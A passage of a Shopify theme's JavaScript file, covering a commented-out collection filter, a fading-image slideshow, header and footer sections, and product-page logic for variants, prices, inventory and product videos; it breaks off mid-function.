  //       isAnimating = true;
  
  //       const parent = tag.closest('li');
  //       const formEl = tag.closest('form');
  //       const formData = new FormData(formEl);
  
  //       this.renderActiveTag(parent, tag);
  //       this.startLoading();
  //       this.renderFromFormData(formData);
  //     },
  
  //     renderActiveTag: function(parent, el) {
  //       const textEl = parent.querySelector('.tag-text');
  
  //       if (parent.classList.contains(classes.activeTag)) {
  //         parent.classList.remove(classes.activeTag);
  //       } else {
  //         parent.classList.add(classes.activeTag);
  
  //         // If adding a tag, show new tag right away.
  //         // Otherwise, remove it before ajax finishes
  //         if (el.closest('li').classList.contains(classes.removeTagParent)) {
  //           parent.remove();
  //         } else {
  //           // Append new tag in both drawer and sidebar
  //           document.querySelectorAll(selectors.activeTagList).forEach(list => {
  //             // console.log(selectors.activeTagList)
  //             const newTag = document.createElement('li');
  //             const newTagLink = document.createElement('a');
  //             newTag.classList.add('tag', 'tag--remove');
  //             newTagLink.classList.add('btn', 'btn--small');
  //             newTagLink.innerText = textEl.innerText;
  //             newTag.appendChild(newTagLink);
  
  //             list.appendChild(newTag);
              
  //             // document.querySelector('.tag-list--active-tags').appendChild(newTag);
  //           });
  //         }
  //       }
  //     },
  
  //     renderFromFormData: function(formData) {
  //       const searchParams = new URLSearchParams(formData);
  //       this.renderCollectionPage(searchParams);
  //     },
  
  //     renderCollectionPage: function(searchParams, updateURLHash = true) {
  //       this.ajaxRenderer
  //         .renderPage(window.location.pathname, searchParams, updateURLHash)
  //         .then(() => {
  //           document.dispatchEvent(new CustomEvent('collection:reloaded'));
  //           isAnimating = false;
  //         });
        
  //     },
  
  //     initPriceRange: function() {
  //       const priceRangeEls = document.querySelectorAll(selectors.priceRange)
  //       priceRangeEls.forEach((el) => new theme.PriceRange(el, {
  //         // onChange passes in formData
  //         onChange: this.renderFromFormData.bind(this),
  //       }));
  //     },
  
  //     getSortValue: function() {
  //       return this.sortSelect.value || this.defaultSort;
  //     },
  
  //     getDefaultSortValue: function() {
  //       return this.sortSelect.getAttribute('data-default-sortby');
  //     },
  
  //     onSortChange: function() {
  //       this.queryParams = new URLSearchParams(window.location.search);
  
  //       this.queryParams.set('sort_by', this.getSortValue());
  //       this.queryParams.delete('page'); // Delete if it exists
  
  //       window.location.search = this.queryParams.toString();
  //     },
  
  //     fetchOpenCollasibleFilters: function() {
  //       return Array.from(
  //         document.querySelectorAll(
  //           `${selectors.sidebar} ${selectors.trigger}.${classes.isOpen}`,
  //         ),
  //       ).map(trigger => trigger.dataset.collapsibleId);
  //     },
  
  //     onReplaceAjaxContent: function(newDom, section) {
  //       const openCollapsibleIds = this.fetchOpenCollasibleFilters();
  
  //       openCollapsibleIds.forEach(selector => {
  //         newDom
  //           .querySelectorAll(`[data-collapsible-id=${selector}]`)
  //           .forEach(this.openCollapsible);
  //       });
  
  //       if (typeof section.nodeId === 'string') {
  //         var newContentEl = newDom.getElementById(section.nodeId);
  //         if (!newContentEl) {
  //           return;
  //         }
  //         document.getElementById(section.nodeId).innerHTML =
  //           newContentEl.innerHTML;
  //       } else {
  //         section.nodeId.forEach(id => {
  //           document.getElementById(id).innerHTML =
  //             newDom.getElementById(id).innerHTML;
  //         });
  //       }
  
  //       this.reInit(newDom);
  //     },
  
  //     openCollapsible: function(el) {
  //       if (el.classList.contains(classes.filterSidebar)) {
  //         el.style.height = 'auto';
  //       }
  
  //       el.classList.add(classes.isOpen);
  //     },
  
  //     reInit: function(doc) {
  //       // Reload collection template (it can be anywhere in the sections.instance array)
  //       for (var i = 0; i < theme.sections.instances.length; i++) {
  //         var instance = theme.sections.instances[i];
  //         if (instance['type'] === 'collection-template') {
  //           instance.forceReload();
  //         }
  //       }
  
  //       // Update collection title
  //       var title = doc.querySelector(selectors.title)
  //       // tgk commented updating page title 
  //       // if (doc && title) {
  //       //   document.querySelector(selectors.title).innerText = title.innerText;;
  //       // }
  
  //       this.initPriceRange();
  //       theme.reinitProductGridItem();
  //     },
  
  //     forceReload: function() {
  //       this.onUnload();
  //       this.init();
  //     },
  
  //     onUnload: () => {},
  
  //     // A liquid variable in the header needs a full page refresh
  //     // if the collection header hero image setting is enabled
  //     // and the header is set to sticky. Only necessary in the editor.
  //     checkIfNeedReload: function() {
  //       if (!Shopify.designMode) {
  //         return;
  //       }
  
  //       if (theme.settings.overlayHeader) {
  //         var header = document.querySelector('.header-wrapper');
  //         if (!header.classList.contains('header-wrapper--overlay')) {
  //           location.reload();
  //         }
  //       }
  //     },
  
  //     bindBackButton: function() {
  //       // Ajax page on back button
  //       window.off('popstate' + this.namespace);
  //       window.on('popstate' + this.namespace, function(state) {
  //         if (state) {
  //           const newUrl = new URL(window.location.href);
  //           this.renderCollectionPage(newUrl.searchParams, false);
  //         }
  //       }.bind(this));
  //     },
  
  //     startLoading: function() {
  //       this.container.querySelectorAll('.grid-product').forEach(item => {
  //         item.classList.add('unload');
  //       });
  //     },
  //   });
  
  //   return Collection;
  // })();
  
  theme.FadingImages = (function() {
  
    var classes = {
      activeImage: 'active-image',
      finishedImage: 'finished-image',
      activeTitles: 'active-titles',
      finishedTitles: 'finished-titles',
      compensation: 'compensation'
    };
  
    function FadingImages(container) {
      this.container = container;
      var sectionId = container.getAttribute('data-section-id');
      var namespace = this.namespace = '.fading-images-' + sectionId;
  
      if (!container) {
        return;
      }
  
      this.imageInterval;
      this.titleInterval;
  
      this.data = {
        interval: container.dataset.interval,
        block_count: container.dataset.count,
        finish_interval: 1000,
        timer_offset: 400,
        active_image: 1,
        active_title: 1,
        removed_compensation: false
      };
  
      theme.initWhenVisible({
        element: this.container,
        callback: this.init.bind(this)
      });
    }
  
    FadingImages.prototype = Object.assign({}, FadingImages.prototype, {
      init: function() {
        var imageContainer = this.container.querySelector('.fading-images');
        imageContainer.classList.remove('loading', 'loading--delayed');
        imageContainer.classList.add('loaded');
  
        this.allTitles = this.container.querySelectorAll('.fading-images-overlay__titles');
  
        // pause when out of view
        var observer = new IntersectionObserver((entries, observer) => {
          entries.forEach(entry => {
            if (entry.isIntersecting) {
              this.startImages();
              this.startTitles();
            } else {
              clearInterval(this.imageInterval);
              clearInterval(this.titleInterval);
            }
          });
        }, {rootMargin: '0px 0px 0px 0px'});
  
        observer.observe(this.container);
      },
  
      nextImage: function() {
        var activeImage = this.container.querySelector('.fading-images__item-wrapper[data-slide-index="' + this.data.active_image + '"]');
  
        if (!this.data.removed_compensation) {
          activeImage.classList.remove(classes.compensation);
          this.data.removed_compensation = true;
        }
  
        activeImage.classList.remove(classes.activeImage);
        activeImage.classList.add(classes.finishedImage);
  
        var target_image = this.data.active_image;
        window.setTimeout(function() {
          activeImage.classList.remove(classes.finishedImage);
        }, this.data.finish_interval);
  
        this.data.active_image++;
        if (this.data.active_image > this.data.block_count) {
          this.data.active_image = 1;
        }
  
        var nextImage = this.container.querySelector('.fading-images__item-wrapper[data-slide-index="' + this.data.active_image + '"]');
  
        nextImage.classList.add(classes.activeImage);
      },
  
      nextTitle: function() {
        this.allTitles.forEach(title => {
          title.classList.remove(classes.activeTitles);
          title.classList.add(classes.finishedTitles);
        });
  
        this.data.active_title++;
        if (this.data.active_title > this.data.block_count) {
          this.data.active_title = 1;
        }
  
        var target_title = this.data.active_title;
        window.setTimeout(function() {
          var slide = this.container.querySelector('.fading-images__item-wrapper[data-slide-index="' + target_title + '"]');
          var newText1 = slide.getAttribute('data-slide-title1');
          var newText2 = slide.getAttribute('data-slide-title2');
  
          this.container.querySelector('.fading-images-overlay__title--1').textContent = newText1;
          var textTwoContainer = this.container.querySelector('.fading-images-overlay__title--2');
          if (textTwoContainer) {
            textTwoContainer.textContent = newText2;
          }
  
          this.allTitles.forEach(title => {
            title.classList.remove(classes.finishedTitles);
            title.classList.add(classes.activeTitles);
          });
  
        }.bind(this), this.data.finish_interval - 200);
      },
  
      startImages: function() {
        // Prep and show first image
        var firstImage = this.container.querySelector('.fading-images__item-wrapper[data-slide-index="' + this.data.active_image + '"]');
        firstImage.classList.add(classes.activeImage);
        firstImage.classList.add(classes.compensation);
  
        // Begin timer
        window.setTimeout(function() {
          this.imageInterval = setInterval(this.nextImage.bind(this), this.data.interval);
        }.bind(this), this.data.timer_offset);
      },
  
      startTitles: function() {
        // Prep and show first titles
        var target_title = this.data.active_title;
  
        window.setTimeout(function() {
          var slide = this.container.querySelector('.fading-images__item-wrapper[data-slide-index="' + target_title + '"]');
          var newText1 = slide.getAttribute('data-slide-title1');
          var newText2 = slide.getAttribute('data-slide-title2');
  
          this.container.querySelector('.fading-images-overlay__title--1').textContent = newText1;
          var textTwoContainer = this.container.querySelector('.fading-images-overlay__title--2');
          if (textTwoContainer) {
            textTwoContainer.textContent = newText2;
          }
  
          this.allTitles.forEach(title => {
            title.classList.add(classes.activeTitles);
          });
        }.bind(this), 750);
  
        // Begin timer
        this.titleInterval = setInterval(this.nextTitle.bind(this), this.data.interval);
      }
    });
  
    return FadingImages;
  })();
  
  theme.FooterSection = (function() {
    var selectors = {
      locale: 'FooterLocale',
      currency: 'FooterCurrency'
    };
  
    function FooterSection(container) {
      this.container = container;
      this.localeDisclosure = null;
      this.currencyDisclosure = null;
  
      this.init();
    }
  
    FooterSection.prototype = Object.assign({}, FooterSection.prototype, {
      init: function() {
        var localeEl = document.getElementById(selectors.locale);
        var currencyEl = document.getElementById(selectors.currency);
  
        if (localeEl) {
          this.localeDisclosure = new theme.Disclosure(localeEl);
        }
  
        if (currencyEl) {
          this.currencyDisclosure = new theme.Disclosure(currencyEl);
        }
  
        // Re-hook up collapsible box triggers
        theme.collapsibles.init(this.container);
      },
  
      onUnload: function() {
        if (this.localeDisclosure) {
          this.localeDisclosure.destroy();
        }
  
        if (this.currencyDisclosure) {
          this.currencyDisclosure.destroy();
        }
      }
    });
  
    return FooterSection;
  })();
  
  theme.HeaderSection = (function() {
    function HeaderSection(container) {
      this.init();
    }
  
    HeaderSection.prototype = Object.assign({}, HeaderSection.prototype, {
      init: function() {
        // Reload any slideshow if header is reloaded to make sure
        // sticky header works as expected
        // (can be anywhere in sections.instance array)
        if (Shopify && Shopify.designMode) {
          for (var i = 0; i < theme.sections.instances.length; i++) {
            var instance = theme.sections.instances[i];
            if (instance['type'] === 'slideshow-section') {
              instance.forceReload();
            }
          }
        }
  
        theme.headerNav.init();
        theme.announcementBar.init();
        this.initDrawers();
        this.hoverMenu();
      },
  
      initDrawers: function() {
        if (theme.NavDrawer && typeof theme.NavDrawer.destroy === 'function') {
          theme.NavDrawer.destroy();
        }
        theme.NavDrawer = new theme.Drawers('NavDrawer', 'nav');

        if (theme.settings.cartType === 'drawer') {
          if (!document.body.classList.contains('template-cart')) {
            if (theme.cartDrawer && typeof theme.cartDrawer.destroy === 'function') {
              theme.cartDrawer.destroy();
            }
            theme.cartDrawer = new theme.CartDrawer();
          }
        } else if (theme.cartDrawer && typeof theme.cartDrawer.destroy === 'function') {
          theme.cartDrawer.destroy();
          theme.cartDrawer = null;
        }

        theme.collapsibles.init(document.getElementById('NavDrawer'));
      },
  
      hoverMenu: function() {
        const detailsEl = document.querySelectorAll('[data-section-type="header"] details[data-hover="true"]');
  
        detailsEl.forEach((detail) => {
          const summary = detail.querySelector('summary');
          const summaryLink = summary.dataset.link;
  
          summary.addEventListener('click', e => {
            e.preventDefault();
            window.location.href = summaryLink;
          });
  
          detail.addEventListener('mouseover', () => {
            if (!detail.hasAttribute('open')) {
              detail.setAttribute('open', '');
              detail.setAttribute('aria-expanded', 'true');
            }
          });
  
          detail.addEventListener('mouseleave', () => {
            if (detail.hasAttribute('open')) {
              detail.removeAttribute('open');
              detail.setAttribute('aria-expanded', 'false');
            }
          });
        });
      },
  
      onUnload: function() {
        try {
          if (theme.NavDrawer) {
            theme.NavDrawer.close();
          }
        } catch (e) {}

        if (theme.NavDrawer && typeof theme.NavDrawer.destroy === 'function') {
          theme.NavDrawer.destroy();
        }

        if (theme.cartDrawer && typeof theme.cartDrawer.destroy === 'function') {
          theme.cartDrawer.destroy();
          theme.cartDrawer = null;
        }

        theme.announcementBar.unload();
      }
    });
  
    return HeaderSection;
  })();
  
  theme.Product = (function() {
    var videoObjects = {};
  
    var classes = {
      onSale: 'sale-price',
      disabled: 'disabled',
      isModal: 'is-modal',
      loading: 'loading',
      loaded: 'loaded',
      hidden: 'hide',
      interactable: 'video-interactable',
      visuallyHide: 'visually-invisible',
      lowInventory: 'inventory--low',
    };
  
    var selectors = {
      productVideo: '.product__video',
      videoParent: '.product__video-wrapper',
      slide: '.product-main-slide',
      currentSlide: '.is-selected',
      startingSlide: '.starting-slide',
      variantType: '.variant-wrapper',
      blocks: '[data-product-blocks]',
      blocksHolder: '[data-blocks-holder]',
      dynamicVariantsEnabled: '[data-dynamic-variants-enabled]',
    };
  
    function Product(container) {
      this.container = container;
      var sectionId = this.sectionId = container.getAttribute('data-section-id');
      var productId = this.productId = container.getAttribute('data-product-id');
  
      this.inModal = (container.dataset.modal === 'true');
      this.modal;
  
      this.settings = {
        enableHistoryState: container.dataset.history || false,
        namespace: '.product-' + sectionId,
        inventory: false,
        inventoryThreshold: 10,
        modalInit: false,
        hasImages: true,
        imageSetName: null,
        imageSetIndex: null,
        currentImageSet: null,
        imageSize: '620x',
        currentSlideIndex: 0,
        videoLooping: container.dataset.videoLooping
      };
  
      // Overwrite some settings when loaded in modal
      if (this.inModal) {
        this.settings.enableHistoryState = false;
        this.settings.namespace = '.product-' + sectionId + '-modal';
        this.modal = document.getElementById('QuickShopModal-' + productId);
      }
  
      this.selectors = {
        variantsJson: '[data-variant-json]',
        currentVariantJson: '[data-current-variant-json]',
        form: '.product-single__form',
  
        media: '[data-product-media-type-model]',
        closeMedia: '.product-single__close-media',
        photoThumbs: '[data-product-thumb]',
        thumbSlider: '[data-product-thumbs]',
        thumbScroller: '.product__thumbs--scroller',
        mainSlider: '[data-product-photos]',
        imageContainer: '[data-product-images]',
        productImageMain: '[data-product-image-main]',
  
        priceWrapper: '[data-product-price-wrap]',
        price: '[data-product-price]',
        comparePrice: '[data-compare-price]',
        priceA11y: '[data-a11y-price]',
        comparePriceA11y: '[data-compare-price-a11y]',
        unitWrapper: '[data-unit-price-wrapper]',
        unitPrice: '[data-unit-price]',
        unitPriceBaseUnit: '[data-unit-base]',
        sku: '[data-sku]',
        inventory: '[data-product-inventory]',
        incomingInventory: '[data-incoming-inventory]',
        colorLabel: '[data-variant-color-label]',
  
        addToCart: '[data-add-to-cart]',
        addToCartText: '[data-add-to-cart-text]',
  
        originalSelectorId: '[data-product-select]',
  
        singleOptionSelector: '[data-variant-input]',
        dynamicVariantsEnabled: '[data-dynamic-variants-enabled]',
        variantColorSwatch: '.variant__input--color-swatch',
  
        availabilityContainer: '[data-store-availability-holder]'
      };
  
      this.cacheElements();
  
      this.firstProductImage = this.cache.mainSlider.querySelector('img');
  
      if (!this.firstProductImage) {
        this.settings.hasImages = false;
      }
  
      var dataSetEl = this.cache.mainSlider.querySelector('[data-set-name]');
      if (dataSetEl) {
        this.settings.imageSetName = dataSetEl.dataset.setName;
      }
  
      this.init();
    }
  
    Product.prototype = Object.assign({}, Product.prototype, {
      init: function() {
        if (this.inModal) {
          this.container.classList.add(classes.isModal);
          document.addEventListener('modalOpen.QuickShopModal-' + this.productId, this.openModalProduct.bind(this));
          document.addEventListener('modalClose.QuickShopModal-' + this.productId, this.closeModalProduct.bind(this));
        }
  
        if (!this.inModal) {
          this.formSetup();
          this.productSetup();
          this.videoSetup();
          this.initProductSlider();
          this.customMediaListners();
        }
      },
  
      cacheElements: function() {
        this.cache = {
          form: this.container.querySelector(this.selectors.form),
          mainSlider: this.container.querySelector(this.selectors.mainSlider),
          thumbSlider: this.container.querySelector(this.selectors.thumbSlider),
          thumbScroller: this.container.querySelector(this.selectors.thumbScroller),
          productImageMain: this.container.querySelector(this.selectors.productImageMain),
  
          // Price-related
          priceWrapper: this.container.querySelector(this.selectors.priceWrapper),
          comparePriceA11y: this.container.querySelector(this.selectors.comparePriceA11y),
          comparePrice: this.container.querySelector(this.selectors.comparePrice),
          price: this.container.querySelector(this.selectors.price),
          priceA11y: this.container.querySelector(this.selectors.priceA11y)
        };
      },
  
      onUnload: function() {
        theme.ProductMedia.removeSectionModels(this.sectionId);

        if (this.flickity && typeof this.flickity.destroy === 'function') {
          this.flickity.destroy();
        }

        if (this.storeAvailability && typeof this.storeAvailability.destroy === 'function') {
          this.storeAvailability.destroy();
        }
      },

      formSetup: function() {
        this.initQtySelector();
        this.initAjaxProductForm();
        this.availabilitySetup();
        this.initVariants();
      },
  
      availabilitySetup: function() {
        var container = this.container.querySelector(this.selectors.availabilityContainer);
        if (container) {
          this.storeAvailability = new theme.StoreAvailability(container);
        }
      },
  
      productSetup: function() {
        this.setImageSizes();
        this.initImageZoom();
        this.initModelViewerLibraries();
        this.initShopifyXrLaunch();
        theme.collapsibles.init(this.container);

        if (theme.productAccordion && typeof theme.productAccordion.init === 'function') {
          theme.productAccordion.init(this.container);
        }

        if (window.SPR) {SPR.initDomEls();SPR.loadBadges()}
      },
  
      setImageSizes: function() {
        if (!this.settings.hasImages) {
          return;
        }
  
        // Get srcset image src, works on most modern browsers
        // otherwise defaults to settings.imageSize
        var currentImage = this.firstProductImage.currentSrc;
  
        if (currentImage) {
          this.settings.imageSize = theme.Images.imageSize(currentImage);
        }
      },
  
      initVariants: function() {
        var variantJson = this.container.querySelector(this.selectors.variantsJson);
  
        if (!variantJson) {
          return;
        }
  
        this.variantsObject = JSON.parse(variantJson.innerHTML);
        var dynamicVariantsEnabled = !!this.container.querySelector(selectors.dynamicVariantsEnabled)
  
        var options = {
          container: this.container,
          enableHistoryState: this.settings.enableHistoryState,
          singleOptionSelector: this.selectors.singleOptionSelector,
          originalSelectorId: this.selectors.originalSelectorId,
          variants: this.variantsObject,
          dynamicVariantsEnabled
        };
  
        this.variants = new theme.Variants(options);
  
        this.container.querySelectorAll(this.selectors.variantColorSwatch).forEach(swatch => {
          swatch.addEventListener('change', function(evt) {
            var el = evt.currentTarget;
            var color = el.dataset.colorName;
            var index = el.dataset.colorIndex;
            this.updateColorName(color, index);
          }.bind(this));
        });

        // Sync label when another option (e.g. Mat Type) auto-selects a colour
        this.container.on('variantChange' + this.settings.namespace, this.syncColorLabel.bind(this));

        // Product availability on page load
        if (this.storeAvailability) {
          var variant_id = this.variants.currentVariant ? this.variants.currentVariant.id : this.variants.variants[0].id;
  
          this.storeAvailability.updateContent(variant_id);
          this.container.on('variantChange' + this.settings.namespace, this.updateAvailability.bind(this));
        }
  
        this.container.on('variantChange' + this.settings.namespace, this.updateCartButton.bind(this));
        this.container.on('variantImageChange' + this.settings.namespace, this.updateVariantImage.bind(this));
        this.container.on('variantPriceChange' + this.settings.namespace, this.updatePrice.bind(this));
        this.container.on('variantUnitPriceChange' + this.settings.namespace, this.updateUnitPrice.bind(this));
  
        if (this.container.querySelector(this.selectors.sku)) {
          this.container.on('variantSKUChange' + this.settings.namespace, this.updateSku.bind(this));
        }
  
        var inventoryEl = this.container.querySelector(this.selectors.inventory);
        if (inventoryEl) {
          this.settings.inventory = true;
          this.settings.inventoryThreshold = inventoryEl.dataset.threshold;
  
          // Update inventory on page load
          this.updateInventory({ detail: { variant: this.variants.currentVariant } });
  
          this.container.on('variantChange' + this.settings.namespace, this.updateInventory.bind(this));
        }
  
        // Update individual variant availability on each selection
        if (dynamicVariantsEnabled) {
          var currentVariantJson = this.container.querySelector(this.selectors.currentVariantJson);
  
          if (currentVariantJson) {
            var variantType = this.container.querySelector(selectors.variantType);
  
            if (variantType) {
              new theme.VariantAvailability({
                container: this.container,
                namespace: this.settings.namespace,
                type: variantType.dataset.type,
                variantsObject: this.variantsObject,
                currentVariantObject: JSON.parse(currentVariantJson.innerHTML)
              });
            }
          }
        }
  
        // image set names variant change listeners
        if (this.settings.imageSetName) {
          var variantWrapper = this.container.querySelector('.variant-input-wrap[data-handle="'+this.settings.imageSetName+'"]');
          if (variantWrapper) {
            this.settings.imageSetIndex = variantWrapper.dataset.index;
            this.container.on('variantChange' + this.settings.namespace, this.updateImageSet.bind(this))
          } else {
            this.settings.imageSetName = null;
          }
        }
      },
  
      /*============================================================================
        Variant change methods
      ==============================================================================*/
      updateColorName: function(color, index) {
        // Updates on radio button change, not variant.js
        this.container.querySelector(this.selectors.colorLabel + `[data-index="${index}"`).textContent = color;
      },

      syncColorLabel: function() {
        var checkedSwatch = this.container.querySelector(this.selectors.variantColorSwatch + ':checked');
        if (!checkedSwatch) {
          return;
        }
        this.updateColorName(checkedSwatch.dataset.colorName, checkedSwatch.dataset.colorIndex);
      },
  
      initQtySelector: function() {
        this.container.querySelectorAll('.js-qty__wrapper').forEach(el => {
          new theme.QtySelector(el, {
            namespace: '.product'
          });
        });
      },
  
      initAjaxProductForm: function() {
        if (theme.settings.cartType === 'drawer') {
          new theme.AjaxProduct(this.cache.form);
        }
      },
  
      updateCartButton: function(evt) {
        var variant = evt.detail.variant;
        var cartBtn = this.container.querySelector(this.selectors.addToCart);
        var cartBtnText = this.container.querySelector(this.selectors.addToCartText);
  
        if (!cartBtn) return;

        if (cartBtn.hasAttribute('data-coming-soon')) {
          cartBtn.classList.add(classes.disabled);
          cartBtn.disabled = true;
          cartBtnText.textContent = 'COMING SOON';
          return;
        }
  
        if (variant) {
          if (variant.available) {
            // Available, enable the submit button and change text
            cartBtn.classList.remove(classes.disabled);
            cartBtn.disabled = false;
            var defaultText = cartBtnText.dataset.defaultText;
            cartBtnText.textContent = defaultText;
          } else {
            // Sold out, disable the submit button and change text
            cartBtn.classList.add(classes.disabled);
            cartBtn.disabled = true;
            cartBtnText.textContent = theme.strings.soldOut;
          }
        } else {
          // The variant doesn't exist, disable submit button
          cartBtn.classList.add(classes.disabled);
          cartBtn.disabled = true;
          cartBtnText.textContent = theme.strings.unavailable;
        }
      },
  
      updatePrice: function(evt) {
        var variant = evt.detail.variant;
        var saveBadges = this.container.querySelectorAll('[data-product-save]');
  
        if (variant) {
          // Regular price
          this.cache.price.innerHTML = theme.Currency.formatMoney(variant.price, theme.settings.moneyFormat);
  
          // Sale price, if necessary
          if (variant.compare_at_price > variant.price) {
            this.cache.comparePrice.innerHTML = theme.Currency.formatMoney(variant.compare_at_price, theme.settings.moneyFormat);
            this.cache.priceWrapper.classList.remove(classes.hidden);
            this.cache.price.classList.add(classes.onSale);
            this.cache.comparePriceA11y.setAttribute('aria-hidden', 'false');
            this.cache.priceA11y.setAttribute('aria-hidden', 'false');

            if (saveBadges.length) {
              saveBadges.forEach(function(badge) {
                var savedAmount;
                var saveType = badge.dataset.saveType || 'percent';
                var saveTemplate = badge.dataset.saveTemplate || 'SAVE __AMOUNT__';

                if (saveType === 'dollar') {
                  savedAmount = theme.Currency.formatMoney(variant.compare_at_price - variant.price, theme.settings.moneyFormat).replace('.00', '');
                } else {
                  savedAmount = Math.round(((variant.compare_at_price - variant.price) / variant.compare_at_price) * 100) + '%';
                }

                badge.textContent = saveTemplate.replace('__AMOUNT__', savedAmount);
                badge.classList.remove(classes.hidden);
              });
            }
          } else {
            if (this.cache.priceWrapper) {
              this.cache.priceWrapper.classList.add(classes.hidden);
            }
            this.cache.price.classList.remove(classes.onSale);
            if (this.cache.comparePriceA11y) {
              this.cache.comparePriceA11y.setAttribute('aria-hidden', 'true');
            }
            this.cache.priceA11y.setAttribute('aria-hidden', 'true');

            if (saveBadges.length) {
              saveBadges.forEach(function(badge) {
                badge.classList.add(classes.hidden);
              });
            }
          }
        } else if (saveBadges.length) {
          saveBadges.forEach(function(badge) {
            badge.classList.add(classes.hidden);
          });
        }
      },
  
      updateUnitPrice: function(evt) {
        var variant = evt.detail.variant;
  
        if (variant && variant.unit_price) {
          this.container.querySelector(this.selectors.unitPrice).innerHTML = theme.Currency.formatMoney(variant.unit_price, theme.settings.moneyFormat);
          this.container.querySelector(this.selectors.unitPriceBaseUnit).innerHTML = theme.Currency.getBaseUnit(variant);
          this.container.querySelector(this.selectors.unitWrapper).classList.remove(classes.visuallyHide);
        } else {
          this.container.querySelector(this.selectors.unitWrapper).classList.add(classes.visuallyHide);
        }
      },
  
      imageSetArguments: function(variant) {
        var variant = variant ? variant : (this.variants ? this.variants.currentVariant : null);
        if (!variant) return;
  
        var setValue = this.settings.currentImageSet = this.getImageSetName(variant[this.settings.imageSetIndex]);
        var set = this.settings.imageSetName + '_' + setValue;
  
        // Always start on index 0
        this.settings.currentSlideIndex = 0;
  
        // Return object that adds cellSelector to mainSliderArgs
        return {
          cellSelector: '[data-group="'+set+'"]',
          imageSet: set,
          initialIndex: this.settings.currentSlideIndex
        }
      },
  
      updateImageSet: function(evt) {
        // If called directly, use current variant
        var variant = evt ? evt.detail.variant : (this.variants ? this.variants.currentVariant : null);
        if (!variant) {
          return;
        }
  
        var setValue = this.getImageSetName(variant[this.settings.imageSetIndex]);
  
        // Already on the current image group
        if (this.settings.currentImageSet === setValue) {
          return;
        }
  
        this.initProductSlider(variant);
      },
  
      // Show/hide thumbnails based on current image set
      updateImageSetThumbs: function(set) {
        this.cache.thumbSlider.querySelectorAll('.product__thumb-item').forEach(thumb => {
          thumb.classList.toggle(classes.hidden, thumb.dataset.group !== set);
        });
      },
  
      getImageSetName: function(string) {
        return string.toLowerCase().replace(/[^a-z0-9]+/g, '-').replace(/-$/, '').replace(/^-/, '');
      },
  
      updateSku: function(evt) {
        var variant = evt.detail.variant;
        var newSku = '';
  
        if (variant) {
          if (variant.sku) {
            newSku = variant.sku;
          }
  
          this.container.querySelector(this.selectors.sku).textContent = newSku;
        }
      },
  
      updateInventory: function(evt) {
        var variant = evt.detail.variant;
  
        // Hide stock if no inventory management or policy is continue
        if (!variant || !variant.inventory_management || variant.inventory_policy === 'continue') {
          this.toggleInventoryQuantity(false);
          this.toggleIncomingInventory(true, false);
          return;
        }
  
        if (variant.inventory_management === 'shopify' && window.inventories && window.inventories[this.productId]) {
          const variantInventoryObject = window.inventories[this.productId][variant.id];
  
          const { quantity, policy, incoming, next_incoming_date } = variantInventoryObject || {};
  
          this.toggleInventoryQuantity(quantity);
  
          if ((incoming && !variant.available) || (quantity <= 0 && policy === 'continue')) {
            if (!variant.available) {
              this.toggleIncomingInventory(false);
            } else {
              this.toggleIncomingInventory(true, next_incoming_date); 
            }
            this.toggleIncomingInventory(true, next_incoming_date);
          } else {
            this.toggleIncomingInventory(false);
          }
        }
      },
  
      updateAvailability: function(evt) {
        var variant = evt.detail.variant;
        if (!variant) {
          return;
        }
  
        this.storeAvailability.updateContent(variant.id);
      },
  
      toggleInventoryQuantity: function(quantity) {
  
        const productInventoryEl = this.container.querySelector(this.selectors.inventory);
        const inventorySalesPoint = productInventoryEl.closest('.sales-point');
  
        let showLowInventoryMessage = false;
  
        // Check if we should show low inventory message
        if (parseInt(quantity) <= parseInt(this.settings.inventoryThreshold) && parseInt(quantity) > 0) {
          showLowInventoryMessage = true;
        }
  
        if (parseInt(quantity) > 0) {
          if (showLowInventoryMessage) {
            productInventoryEl.parentNode.classList.add(classes.lowInventory);
            if (quantity > 1) {
              productInventoryEl.textContent = theme.strings.otherStockLabel.replace('[count]', quantity);
            } else {
              productInventoryEl.textContent = theme.strings.oneStockLabel.replace('[count]', quantity);
            }
          } else {
            productInventoryEl.parentNode.classList.remove(classes.lowInventory);
            productInventoryEl.textContent = theme.strings.inStockLabel;
          }
  
          if (inventorySalesPoint) {
            inventorySalesPoint.classList.remove(classes.hidden);
          }
  
        } else {
          if (inventorySalesPoint) {
            inventorySalesPoint.classList.add(classes.hidden);
          }
        }
      },
  
      toggleIncomingInventory: function(showIncomingInventory, incomingInventoryDate) {
  
        const incomingInventoryEl = this.container.querySelector(this.selectors.incomingInventory);
  
        if (!incomingInventoryEl) return;
  
        const incomingInventoryBlockEnabled = incomingInventoryEl.dataset.enabled === 'true';
        const textEl = incomingInventoryEl.querySelector('.js-incoming-text');
  
        // If incoming inventory block is disabled, hide it
        if (!incomingInventoryBlockEnabled) {
          incomingInventoryEl.classList.add(classes.hidden);
          return;
        }
  
        if (showIncomingInventory) {
          textEl.textContent = theme.strings.waitingForStock;
          incomingInventoryEl.classList.remove(classes.hidden);
        } else {
          incomingInventoryEl.classList.add(classes.hidden);
        }
      },
  
      /*============================================================================
        Product videos
      ==============================================================================*/
      videoSetup: function() {
        var productVideos = this.cache.mainSlider.querySelectorAll(selectors.productVideo);
  
        if (!productVideos.length) {
          return false;
        }
  
        productVideos.forEach(vid => {
          var type = vid.dataset.videoType;
          if (type === 'youtube') {
            this.initYoutubeVideo(vid);
          } else if (type === 'vimeo') {
            this.initVimeoVideo(vid);
          } else if (type === 'mp4') {
            this.initMp4Video(vid);
          }
        });
      },
  
      initYoutubeVideo: function(div) {
        videoObjects[div.id] = new theme.YouTube(
          div.id,
          {
            videoId: div.dataset.videoId,
            videoParent: selectors.videoParent,
            autoplay: false, // will handle this in callback
            style: div.dataset.videoStyle,
            loop: div.dataset.videoLoop,
            events: {
              onReady: this.youtubePlayerReady.bind(this),
              onStateChange: this.youtubePlayerStateChange.bind(this)
            }
          }
        );
      },
  
      initVimeoVideo: function(div) {
        videoObjects[div.id] = new theme.VimeoPlayer(
          div.id,
          div.dataset.videoId,
          {
            videoParent: selectors.videoParent,
            autoplay: false,
            style: div.dataset.videoStyle,
            loop: div.dataset.videoLoop,
          }
        )
      },
  
      // Comes from YouTube SDK
      // Get iframe ID with evt.target.getIframe().id
      // Then access product video players with videoObjects[id]
      youtubePlayerReady: function(evt) {
        var iframeId = evt.target.getIframe().id;
  
        if (!videoObjects[iframeId]) {
          // No youtube player data
          return;
        }
  
        var obj = videoObjects[iframeId];
        var player = obj.videoPlayer;
  
        if (obj.options.style !== 'sound') {
          player.mute();
        }
  
        obj.parent.classList.remove('loading');
        obj.parent.classList.add('loaded');
